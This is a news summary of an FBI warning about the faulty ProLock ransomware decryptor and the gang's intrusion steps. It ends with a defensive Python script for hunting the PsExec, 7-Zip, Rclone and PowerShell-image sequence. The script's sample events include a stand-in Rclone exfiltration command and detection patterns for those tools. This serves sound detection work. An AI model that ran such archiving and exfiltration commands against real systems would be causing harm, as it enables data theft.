According to information received by Bleeping Computer, the FBI is warning victims of the ProLock ransomware that the decryptor may not work correctly. Files over 64 MB could become corrupted during decryption, and files over 100 MB can lose one byte per 1 KB decrypted. This means that even victims who choose to pay the ransom may still lose access to critical files due to bugs in the decryption software provided by the ransomware operators.
Recently renamed, ProLock got its start as PwndLocker in 2019. ProLock is currently known to spread via Qakbot infection or through exposed Remote Desktop Protocol (RDP) services with weak credentials. Using previously stolen credentials or ones obtained through Qakbot, the ProLock operators use PsExec to execute scripts on remote hosts. Before installing the ransomware, the operators compress the data they intend to steal with 7-Zip and exfiltrate it using the open-source application Rclone. Finally, the group attempts to deploy the ransomware across the entire organization by using PowerShell to inject a binary into memory after it is extracted from either a JPG or a PNG file.
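A defender can hunt for this sequence in process-creation logs. The following Python example is added here and is not from the original report: it flags hosts where PsExec execution, 7-Zip archiving, an Rclone transfer and a PowerShell command referencing a JPG or PNG appear in that order within a time window. The event tuples, regexes, file paths, the `remote:bucket` target and the 12-hour window are constructed assumptions.

```python
import re
from datetime import datetime, timedelta

# Ordered stages from the paragraph above. The regexes are assumptions about
# how each tool shows up in process-creation telemetry; tune them locally.
STAGES = [
    ("psexec_remote_exec", re.compile(r"psexesvc\.exe", re.I)),
    ("7zip_archive", re.compile(r"\b7za?(\.exe)?\s+a\s", re.I)),
    ("rclone_transfer", re.compile(r"\brclone(\.exe)?\s", re.I)),
    ("powershell_reads_image", re.compile(r"powershell.*\.(jpe?g|png)\b", re.I)),
]
WINDOW = timedelta(hours=12)  # assumed correlation window

# Constructed sample events: (host, ISO time, parent image, command line).
EVENTS = [
    ("FS01", "2020-01-01T02:10:00", "services.exe", r"C:\Windows\PSEXESVC.exe"),
    ("FS01", "2020-01-01T02:10:05", "PSEXESVC.exe", r"cmd /c C:\Temp\run.bat"),
    ("FS01", "2020-01-01T02:14:00", "cmd.exe", r"7z.exe a C:\Temp\out.7z D:\Shares"),
    ("FS01", "2020-01-01T02:31:00", "cmd.exe", r"rclone.exe copy C:\Temp\out.7z remote:bucket"),
    ("FS01", "2020-01-01T03:02:00", "cmd.exe", r"powershell.exe -File C:\Temp\l.ps1 C:\Temp\logo.png"),
    ("WS07", "2020-01-01T09:00:00", "explorer.exe", "7z.exe a backup.7z Documents"),
    ("WS07", "2020-01-01T09:30:00", "explorer.exe", "powershell.exe Get-ChildItem"),
]

def find_chains(events, window=WINDOW):
    """Return {host: [(stage, time), ...]} for hosts showing all stages in order."""
    hits, progress = {}, {}
    for host, ts, parent, cmdline in sorted(events, key=lambda e: e[1]):
        when = datetime.fromisoformat(ts)
        seen = progress.setdefault(host, [])
        if seen and when - seen[0][1] > window:
            seen.clear()  # chain went stale; start over with this event
        name, pattern = STAGES[len(seen)]
        if pattern.search(parent + " " + cmdline):
            seen.append((name, when))
        if len(seen) == len(STAGES):
            hits[host] = list(seen)
            seen.clear()
    return hits

if __name__ == "__main__":
    for host, chain in find_chains(EVENTS).items():
        print(host, [f"{stage}@{when:%H:%M}" for stage, when in chain])
```

Each tool on its own is common in legitimate administration, which is why the example alerts only on the ordered combination per host rather than on any single match.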